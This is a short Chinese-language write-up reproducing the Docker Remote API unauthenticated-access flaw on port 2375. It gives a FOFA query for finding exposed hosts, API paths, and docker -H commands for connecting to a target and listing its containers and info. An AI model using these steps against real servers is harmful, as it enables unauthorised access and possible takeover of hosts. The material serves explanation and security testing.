Docker Remote API未授权访问漏洞复现

一、漏洞信息

Docker Remote API如设置不当可导致未授权访问，被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据，可能导致敏感信息泄露，⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感 信息，或对敏感⽂件进⾏修改，最终完全控制服务器。

二、漏洞复现

1.利用以下fofa语句对docker产品举行搜刮：

1. port="2375"

复制代码

2.在搜刮的结果网站后访问以下路径

1. http://ip:2375/version        #查看版本信息
2. http://ip:2375/info        #查看容器信息

复制代码

3.可以利用-H参数连接目标主机的docker

1. docker -H tcp://ip:2375 ps        #查看目标主机运行的镜像
2. docker -H tcp://ip:2375 version        #查看目标主机的版本信息
3. docker -H tcp://ip:2375 info        #查看目标主机的容器信息

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。